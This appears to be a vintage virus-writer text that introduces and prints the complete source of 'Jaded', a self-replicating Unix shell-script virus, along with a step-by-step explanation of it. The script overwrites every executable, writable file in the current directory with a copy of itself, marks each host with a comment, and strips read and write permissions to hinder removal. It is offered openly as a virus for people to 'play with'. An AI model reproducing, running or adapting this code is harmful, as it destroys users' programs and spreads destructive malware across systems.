                            Linux/Unix Shell Script

 This virus, Jaded was writen as a chalange to a friend's statement that a virus
COULD not be writen in shell script, plus, I figured I'd another thing for
people to play with.

 I relise that some of you may not understand the following code...but it's
fairly easy.

Basicly, "infected" files look like this:

-this is a carriage return peoples-
# <last file infected's name>
<virus follows>

well...you may be saying "how can this be poly?"

think about it the rest of the virus will be moved down...so it's semi-poly.
Also, the amount it moves down is random (due to the nature of linux, sizes
of names can be hudge or small)....and also the "junk" put in-between is
also mostly-random.

Functions.

1. Comments (anything after #)
2. finding files, each file name goes into $file
3. declaring loop
4. test file for attributes: executable, writable, file.
5. "copyright" or so.
6. Echoing a charage return (I made this mistake, ment to put it as a null
   but, I didn't bother to screw with it...not worth my time.
7. Put virus in file .tmp (hidden)
8. Poly new host (sorta)
9. append virus after "garbage"
10. make it unreadable/writeable (makes it a witle bit harder to remove
    and makes infection marking easy)
11. delete temp file
12. end if, end if , end if
13. done with it all.

Comprende? If not, feel free to contact me....if it's a descent comment
or question, I'll be happy to answer.

--------------------=[Begin Jaded]=------------------
# Someone had to do it.
# [Jaded] experiment in *nix 'viruses'
# Overwriter SemiPoly :(
for file in *
do
if test -x $file
 then
if test -w $file
 then
if test -f $file
 then
# Techno Phunk
echo "">$file
cp $0 .tmp
echo '#' $fileX >>$file
fileX=$file
cat .tmp>>$file
chmod a-wr $file
rm .tmp
fi ; fi ; fi
done
exit

--------------------=[Endin Jaded]=------------------
                                                        - Techno Phunk -
